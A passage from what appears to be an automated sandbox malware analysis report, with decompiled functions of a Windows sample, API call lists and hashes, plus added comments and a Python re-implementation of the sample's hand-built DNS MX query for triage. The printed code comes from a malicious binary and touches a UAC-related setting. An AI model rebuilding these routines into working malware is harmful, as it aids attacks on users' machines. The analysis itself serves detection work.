                                                                                							if((_t53 & 0x0000ffff) + _t71 > _a4) {
                                                                                								goto L13;
                                                                                							}
                                                                                							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
                                                                                							if(_t80 == 0) {
                                                                                								goto L13;
                                                                                							}
                                                                                							E0040EE2A(_t76, _t80, 0, 0x124);
                                                                                							E0040EE08(_t80,  &_v296, 0x114);
                                                                                							 *_t80 =  *_t80 & 0x00000000;
                                                                                							_t67 = _t71 + (_v28 & 0x0000ffff);
                                                                                							_t62 = _v8;
                                                                                							_t82 = _t83 + 0x18;
                                                                                							_v8 = _t80;
                                                                                							if(_t62 != 0) {
                                                                                								 *_t62 = _t80;
                                                                                							} else {
                                                                                								_v16 = _t80;
                                                                                							}
                                                                                							_v12 = _v12 + 1;
                                                                                							if(_v12 < _v20) {
                                                                                								continue;
                                                                                							} else {
                                                                                								goto L13;
                                                                                							}
                                                                                						}
                                                                                						goto L13;
                                                                                					}
                                                                                					_t42 = 0;
                                                                                					goto L14;
                                                                                				}
                                                                                				return 0;
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                • Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                				intOrPtr _t30;
                                                                                				CHAR* _t31;
                                                                                				int _t34;
                                                                                				intOrPtr* _t41;
                                                                                				intOrPtr* _t42;
                                                                                				void* _t47;
                                                                                				intOrPtr _t51;
                                                                                				int _t52;
                                                                                				void* _t53;
                                                                                				intOrPtr _t54;
                                                                                				void* _t55;
                                                                                				char _t59;
                                                                                
                                                                                				E0040DD05();
                                                                                				_t41 = 0x4120e8;
                                                                                				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
                                                                                				if(_t55 == 0) {
                                                                                					L9:
                                                                                					_t53 = E0040EBCC(0x1c);
                                                                                					if(_t53 != 0) {
                                                                                						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
                                                                                						 *((intOrPtr*)(_t53 + 4)) = _a8;
                                                                                						E00403E8F(0x4120e8, _t53);
                                                                                						__eflags = _a12;
                                                                                						if(_a12 == 0) {
                                                                                							 *(_t53 + 8) = 0;
                                                                                						} else {
                                                                                							_t15 = _t53 + 8; // 0x8
                                                                                							lstrcpynA(_t15, _a12, 0xf);
                                                                                							 *((char*)(_t53 + 0x17)) = 0;
                                                                                						}
                                                                                						L15:
                                                                                						_t42 = 0x4120e4;
                                                                                						__eflags =  *0x4120e4 - _t42; // 0x4120e4
                                                                                						if(__eflags == 0) {
                                                                                							L22:
                                                                                							_t47 = 1;
                                                                                							L11:
                                                                                							E0040DD69();
                                                                                							return _t47;
                                                                                						} else {
                                                                                							goto L16;
                                                                                						}
                                                                                						do {
                                                                                							L16:
                                                                                							_t30 =  *((intOrPtr*)(_t53 + 4));
                                                                                							_t51 =  *_t42;
                                                                                							__eflags = _t30 - 0xffffffff;
                                                                                							if(_t30 == 0xffffffff) {
                                                                                								L18:
                                                                                								_t20 = _t53 + 8; // 0x8
                                                                                								_t31 = _t20;
                                                                                								__eflags =  *_t31;
                                                                                								if( *_t31 == 0) {
                                                                                									L20:
                                                                                									_t52 = _t51 + 0xc;
                                                                                									__eflags = _t52;
                                                                                									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
                                                                                									goto L21;
                                                                                								}
                                                                                								_t34 = lstrcmpA(_t51 + 0x10, _t31);
                                                                                								__eflags = _t34;
                                                                                								if(_t34 != 0) {
                                                                                									goto L21;
                                                                                								}
                                                                                								goto L20;
                                                                                							}
                                                                                							__eflags =  *(_t51 + 0xc) - _t30;
                                                                                							if( *(_t51 + 0xc) != _t30) {
                                                                                								goto L21;
                                                                                							}
                                                                                							goto L18;
                                                                                							L21:
                                                                                							_t42 =  *_t42;
                                                                                							__eflags =  *_t42 - 0x4120e4;
                                                                                						} while ( *_t42 != 0x4120e4); // 0x4120e4 is a fixed .data address: the walk ends once the next pointer comes back round to it
                                                                                						goto L22;
                                                                                					}
                                                                                					_t47 = 0;
                                                                                					goto L11;
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				do {
                                                                                					L1:
                                                                                					_t54 =  *_t41;
                                                                                					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
                                                                                						if(_a12 != 0) {
                                                                                							_t8 = _t54 + 8; // 0x74cb43e8
                                                                                							__eflags = lstrcmpA(_t8, _a12);
                                                                                						} else {
                                                                                							_t59 =  *(_t54 + 8);
                                                                                						}
                                                                                						if(_t59 == 0) {
                                                                                							break;
                                                                                						} else {
                                                                                							goto L7;
                                                                                						}
                                                                                					}
                                                                                					L7:
                                                                                					_t41 =  *_t41;
                                                                                					_t53 = 0;
                                                                                				} while ( *_t41 != 0x4120e8); // same idiom as above: 0x4120e8 is the fixed .data address the list is walked from
                                                                                				if(_t53 != 0) {
                                                                                					goto L15;
                                                                                				}
                                                                                				goto L9;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                • lstrcmpA.KERNEL32(74CB43E8,00000000,?,74CB43E0,00000000,?,00405EC1), ref: 0040E693
                                                                                • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,74CB43E0,00000000,?,00405EC1), ref: 0040E6E9
                                                                                • lstrcmpA.KERNEL32(?,00000008,?,74CB43E0,00000000,?,00405EC1), ref: 0040E722
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                • String ID: A$ A
                                                                                • API String ID: 3343386518-686259309
                                                                                • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 26%
                                                                                			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
                                                                                				long* _t33;
                                                                                				long _t35;
                                                                                				long* _t36;
                                                                                				long _t37;
                                                                                				long _t38;
                                                                                				short _t39;
                                                                                				short _t40;
                                                                                				char _t42;
                                                                                				intOrPtr _t43;
                                                                                				void* _t48;
                                                                                				long* _t49;
                                                                                				long* _t51;
                                                                                				long* _t52;
                                                                                				long* _t53;
                                                                                				long* _t54;
                                                                                				void* _t55;
                                                                                				long* _t56;
                                                                                				long* _t57;
                                                                                				long* _t60;
                                                                                				intOrPtr* _t63;
                                                                                				intOrPtr* _t65;
                                                                                				void* _t66;
                                                                                
                                                                                				_t65 = __eax;
                                                                                				// global pointer to the packet buffer, allocated on first use
                                                                                				_t33 =  *0x412bf8; // 0x0
                                                                                				_t42 = 0;
                                                                                				if(_t33 == 0) {
                                                                                					_t33 = E0040EBCC(0x400); // heap allocation (GetProcessHeap/RtlAllocateHeap, see APIs below)
                                                                                					_pop(_t48);
                                                                                					 *0x412bf8 = _t33;
                                                                                				}
                                                                                				E0040EE2A(_t48, _t33, _t42, 0x400); // memset-style helper by its argument shape: clears the 0x400-byte buffer
                                                                                				// DNS header: six big-endian 16-bit fields, written with htons (WS2_32 ordinal #9)
                                                                                				_t35 = GetTickCount();
                                                                                				_t49 =  *0x412bf8; // 0x0
                                                                                				_t63 = __imp__#9; // htons
                                                                                				 *_t49 = _t35; // transaction ID seeded from the tick count
                                                                                				_t36 =  *0x412bf8; // 0x0
                                                                                				_t36[0] = _a12; // flags word, supplied by the caller
                                                                                				_t37 =  *_t63(1);
                                                                                				_t51 =  *0x412bf8; // 0x0
                                                                                				_t51[1] = _t37; // QDCOUNT = htons(1): one question
                                                                                				_t52 =  *0x412bf8; // 0x0
                                                                                				_t38 = 0;
                                                                                				_t52[1] = 0; // ANCOUNT = 0 (the decompiler's long* indexing overlaps here; the stores are 16-bit)
                                                                                				_t53 =  *0x412bf8; // 0x0
                                                                                				_t53[2] = 0; // NSCOUNT = 0
                                                                                				_t54 =  *0x412bf8; // 0x0
                                                                                				_t54[2] = 0; // ARCOUNT = 0
                                                                                				_t60 =  *0x412bf8; // 0x0
                                                                                				_t55 = 0;
                                                                                				// QNAME: the dotted name passed in __eax is rewritten as length-prefixed labels starting at buffer offset 12
                                                                                				if( *_t65 != _t42) {
                                                                                					do {
                                                                                						_t43 =  *((intOrPtr*)(_t38 + _t65));
                                                                                						_a12 = _t38;
                                                                                						while(_t43 != 0) {
                                                                                							if(_t43 != 0x2e) { // scan to the next '.'
                                                                                								_a12 = _a12 + 1;
                                                                                								_t43 =  *((intOrPtr*)(_a12 + _t65));
                                                                                								continue;
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38; // label length byte; no check against 63 or the buffer size is visible
                                                                                						_t55 = _t55 + 1;
                                                                                						while(_t38 < _a12) {
                                                                                							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
                                                                                							_t55 = _t55 + 1;
                                                                                							_t38 = _t38 + 1;
                                                                                						}
                                                                                						if( *((char*)(_t38 + _t65)) == 0x2e) { // step over the '.'
                                                                                							_t38 = _t38 + 1;
                                                                                						}
                                                                                						_t42 = 0;
                                                                                					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
                                                                                				}
                                                                                				 *((char*)(_t55 +  &(_t60[3]))) = _t42; // zero byte terminates QNAME
                                                                                				_t24 = _t55 + 0xd; // 0xf  (12-byte header + name bytes + terminator = offset of QTYPE)
                                                                                				_t66 = _t24;
                                                                                				_t39 =  *_t63(0xf); // QTYPE = htons(15): MX
                                                                                				_t56 =  *0x412bf8; // 0x0
                                                                                				 *((short*)(_t56 + _t66)) = _t39;
                                                                                				_t40 =  *_t63(1); // QCLASS = htons(1): IN
                                                                                				_t57 =  *0x412bf8; // 0x0
                                                                                				 *((short*)(_t57 + _t66 + 2)) = _t40;
                                                                                				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10); // sendto(socket, buffer, header + QNAME + 4, 0, sockaddr from caller, sizeof(sockaddr_in))
                                                                                				return 0 | _t40 <= 0x00000000;
                                                                                			}
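Read top to bottom, E004026FF assembles one UDP DNS packet by hand: a 12-byte header with the transaction ID taken from GetTickCount and QDCOUNT = 1, the caller's name split on '.' into length-prefixed labels, then QTYPE 15 (MX) and QCLASS 1 (IN), and hands the result to sendto(). The following Python is an added re-implementation of that wire layout, not code from the sample or from Joe Sandbox, with a parser beside it so a captured UDP payload can be checked for the same shape. The domain, transaction ID and the flags value 0x0100 are constructed here; the sample takes the flags word from its third argument, so that value is an assumption, as is masking the tick count to the low 16 bits of the ID field.

```python
import struct

DNS_HEADER_LEN = 12   # id, flags, qdcount, ancount, nscount, arcount: six big-endian uint16
QTYPE_MX = 15         # the 0xf the sample passes to htons() before sendto()
QTYPE_A = 1
QCLASS_IN = 1         # the second htons(1)


def encode_name(domain: str) -> bytes:
    """Encode a dotted name as DNS labels, mirroring the loop in E004026FF.

    The sample scans to the next '.' (0x2e), writes the label length, copies the
    label bytes, skips the dot and repeats until the NUL terminator, then appends
    a zero byte. As in the sample there is no 63-byte label or total-length check,
    so an empty label (as in "a..b") becomes a 0x00 byte, which a resolver reads
    as the end of the name.
    """
    data = domain.encode("ascii")
    out = bytearray()
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] != 0x2E:
            j += 1
        out.append(j - i)       # label length byte
        out += data[i:j]        # label bytes
        i = j + 1               # step over the '.' (or past the end)
    out.append(0)               # root label terminates QNAME
    return bytes(out)


def build_query(domain: str, txid: int, qtype: int = QTYPE_MX, flags: int = 0x0100) -> bytes:
    """Build the packet E004026FF sends: 12-byte header, one question, no other sections.

    The sample seeds the ID from GetTickCount(); only 16 bits fit the field, so the
    value is masked here (an assumption about how the decompiler's overlapping stores
    resolve). flags=0x0100 (recursion desired) is a placeholder for the caller-supplied word.
    """
    header = struct.pack("!HHHHHH", txid & 0xFFFF, flags & 0xFFFF, 1, 0, 0, 0)
    return header + encode_name(domain) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes) -> dict:
    """Parse a DNS query with the layout above.

    Raises ValueError on anything truncated or unexpected (compression pointers,
    over-long labels, non-ASCII label bytes).
    """
    if len(pkt) < DNS_HEADER_LEN + 1 + 4:
        raise ValueError("packet shorter than header + empty name + qtype/qclass")
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:DNS_HEADER_LEN])
    labels = []
    i = DNS_HEADER_LEN
    while True:
        if i >= len(pkt):
            raise ValueError("name runs past end of packet")
        n = pkt[i]
        i += 1
        if n == 0:
            break
        if n & 0xC0:
            raise ValueError("compression pointer or over-long label in a question name")
        if i + n > len(pkt):
            raise ValueError("label runs past end of packet")
        labels.append(pkt[i:i + n].decode("ascii"))
        i += n
    if i + 4 > len(pkt):
        raise ValueError("missing qtype/qclass")
    qtype, qclass = struct.unpack("!HH", pkt[i:i + 4])
    return {"txid": txid, "flags": flags, "qdcount": qd, "ancount": an,
            "nscount": ns, "arcount": ar, "name": ".".join(labels),
            "qtype": qtype, "qclass": qclass, "length": i + 4}


def is_bare_mx_query(pkt: bytes) -> bool:
    """Triage check: exactly one MX/IN question, empty answer/authority/additional
    sections and nothing after the question. This is the shape the sample emits,
    not a signature for it: any minimal MX lookup matches."""
    try:
        q = parse_query(pkt)
    except ValueError:
        return False
    return (q["qdcount"] == 1 and q["qtype"] == QTYPE_MX and q["qclass"] == QCLASS_IN
            and q["ancount"] == q["nscount"] == q["arcount"] == 0
            and q["length"] == len(pkt))


# Constructed example input; the domain is a placeholder, not one from the report.
SAMPLE_DOMAIN = "mail.example.com"
SAMPLE_TXID = 0x1234

if __name__ == "__main__":
    pkt = build_query(SAMPLE_DOMAIN, SAMPLE_TXID)
    print(len(pkt), pkt.hex())
    print(parse_query(pkt))
```

The packet for the constructed domain is 34 bytes: 12 header bytes, 18 bytes of QNAME (`04 mail 07 example 03 com 00`) and the 4-byte `00 0f 00 01` question trailer, which matches the `_t66 + 4` length the sample hands to sendto(). The parser length check is what distinguishes a bare query from one carrying EDNS or extra records, and the "a..b" case shows why the sample's lack of label validation matters: the empty label truncates the name on the wire.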

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040272E
                                                                                • htons.WS2_32(00000001), ref: 00402752
                                                                                • htons.WS2_32(0000000F), ref: 004027D5
                                                                                • htons.WS2_32(00000001), ref: 004027E3
                                                                                • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                  • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                  • Part of subcall function 0040EBCC: RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                • String ID:
                                                                                • API String ID: 1128258776-0
                                                                                • Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                • Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: setsockopt
                                                                                • String ID:
                                                                                • API String ID: 3981526788-0
                                                                                • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                				int _v8;
                                                                                				int _t18;
                                                                                				intOrPtr _t20;
                                                                                				CHAR* _t21;
                                                                                				int _t30;
                                                                                				CHAR* _t36;
                                                                                
                                                                                				_t18 = lstrlenA(_a12);
                                                                                				_t36 = _a4;
                                                                                				_v8 = _t18;
                                                                                				_t20 = _a8 + _t36;
                                                                                				_a8 = _t20;
                                                                                				if(_t36 >= _t20) {
                                                                                					L5:
                                                                                					_t21 = 0;
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t30 = lstrlenA(_t36);
                                                                                						_t7 =  &(_t36[1]); // 0x1
                                                                                						_a4 = _t30 + _t7;
                                                                                						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
                                                                                							break;
                                                                                						}
                                                                                						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
                                                                                						if(_t36 < _a8) {
                                                                                							continue;
                                                                                						} else {
                                                                                							goto L5;
                                                                                						}
                                                                                						goto L6;
                                                                                					}
                                                                                					_t21 = _a4;
                                                                                				}
                                                                                				L6:
                                                                                				return _t21;
                                                                                			}

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                • lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
                                                                                • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcmpi
                                                                                • String ID: localcfg
                                                                                • API String ID: 1808961391-1857712256
                                                                                • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0040E52E(void* __edx, void* __eflags) {
                                                                                				long _v4;
                                                                                				void* __ecx;
                                                                                				void* _t9;
                                                                                				void* _t11;
                                                                                				void* _t17;
                                                                                				long _t20;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				void* _t28;
                                                                                				void* _t32;
                                                                                				void* _t37;
                                                                                				void* _t40;
                                                                                				void* _t44;
                                                                                
                                                                                				_t44 = __eflags;
                                                                                				_t32 = __edx;
                                                                                				E0040DD05();
                                                                                				_t28 = E0040DBCF(_t44, 0x80000000, 3);
                                                                                				_pop(_t31);
                                                                                				if(_t28 == 0xffffffff) {
                                                                                					L6:
                                                                                					_t9 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
                                                                                					_t11 = E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t9);
                                                                                					_t40 = _t37 + 0x34;
                                                                                					if(_t11 == 0) {
                                                                                						_t17 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
                                                                                						E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t17);
                                                                                						_t40 = _t40 + 0x34;
                                                                                					}
                                                                                					E0040EE2A(_t31, 0x4122f8, 0, 0x100);
                                                                                					E0040EE2A(_t31, 0x4128f8, 0, 0x100);
                                                                                					E0040DD69();
                                                                                					return 1;
                                                                                				}
                                                                                				_t20 = GetFileSize(_t28, 0);
                                                                                				_v4 = _t20;
                                                                                				if(_t20 != 0) {
                                                                                					E0040DB2E(_t20);
                                                                                					_t23 =  *0x4136c4;
                                                                                					_pop(_t31);
                                                                                					if(_t23 != 0) {
                                                                                						_t31 =  &_v4;
                                                                                						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
                                                                                						_t48 = _t24;
                                                                                						if(_t24 != 0) {
                                                                                							E00402544( *0x4136c4,  *0x4136c4, _v4, 0xe4, 0xc8);
                                                                                							E0040E332(_t32, _t48,  *0x4136c4, _v4);
                                                                                							_t37 = _t37 + 0x1c;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				CloseHandle(_t28);
                                                                                				goto L6;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,74CB43E0,?,00000000,?,0040A445), ref: 0040E558
                                                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,74CB43E0,?,00000000,?,0040A445), ref: 0040E583
                                                                                • CloseHandle.KERNEL32(00000000,?,74CB43E0,?,00000000,?,0040A445), ref: 0040E5B2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3683885500-2980165447
                                                                                • Opcode ID: ea61079883e1d137724bdb03d89989e3cb326a6ab799ec698869bd57d3053e24
                                                                                • Instruction ID: 336cca8f28a0ae06816d6806ca3c094c6326420f96deeb8fe64773c8e7208e17
                                                                                • Opcode Fuzzy Hash: ea61079883e1d137724bdb03d89989e3cb326a6ab799ec698869bd57d3053e24
                                                                                • Instruction Fuzzy Hash: F321EAB19402047AE2207B639C0AFAB3D1CDF54758F10093EBA09B11E3E9BDD96082BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0208DF6C: GetCurrentThreadId.KERNEL32 ref: 0208DFBA
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00410170,?,00000000,?,0208A6AC), ref: 0208E7BF
                                                                                • ReadFile.KERNEL32(00000000,004136C4,00000000,?,00000000,?,00410170,?,00000000,?,0208A6AC), ref: 0208E7EA
                                                                                • CloseHandle.KERNEL32(00000000,?,00410170,?,00000000,?,0208A6AC), ref: 0208E819
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCurrentHandleReadSizeThread
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1396056608-2980165447
                                                                                • Opcode ID: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                • Instruction ID: 1846aee8e1ad59ae9c0d8563558433b7be7f2c056bde8e2a84dd5e9bb428c570
                                                                                • Opcode Fuzzy Hash: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                • Instruction Fuzzy Hash: B821E5B1A403007EE2217B319C09FEF3E5DDB65B60F100124FA8EA55D3EAA59450AAB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E00401AC3() {
                                                                                				signed int _v8;
                                                                                				char _v12;
                                                                                				signed int _v16;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				intOrPtr _t24;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr* _t28;
                                                                                				signed int _t39;
                                                                                				void* _t41;
                                                                                				intOrPtr _t43;
                                                                                
                                                                                				_v16 = 0;
                                                                                				_t19 = LoadLibraryA("Iphlpapi.dll");
                                                                                				if(_t19 == 0) {
                                                                                					L15:
                                                                                					return _v16;
                                                                                				}
                                                                                				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
                                                                                				if(_t28 == 0) {
                                                                                					L14:
                                                                                					goto L15;
                                                                                				}
                                                                                				_push( &_v12);
                                                                                				_v8 = 0;
                                                                                				_v12 = 0;
                                                                                				_push(0);
                                                                                				while(1) {
                                                                                					_t41 =  *_t28(2, 0, 0);
                                                                                					if(_t41 != 0x6f) {
                                                                                						break;
                                                                                					}
                                                                                					_t24 = E0040EBED(_v8, _v12);
                                                                                					if(_t24 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_push( &_v12);
                                                                                					_v8 = _t24;
                                                                                					_push(_t24);
                                                                                				}
                                                                                				if(_t41 != 0) {
                                                                                					L11:
                                                                                					if(_v8 != 0) {
                                                                                						E0040EC2E(_v8);
                                                                                					}
                                                                                					L13:
                                                                                					goto L14;
                                                                                				}
                                                                                				_t26 = _v8;
                                                                                				if(_t26 == 0) {
                                                                                					goto L13;
                                                                                				} else {
                                                                                					goto L8;
                                                                                				}
                                                                                				do {
                                                                                					L8:
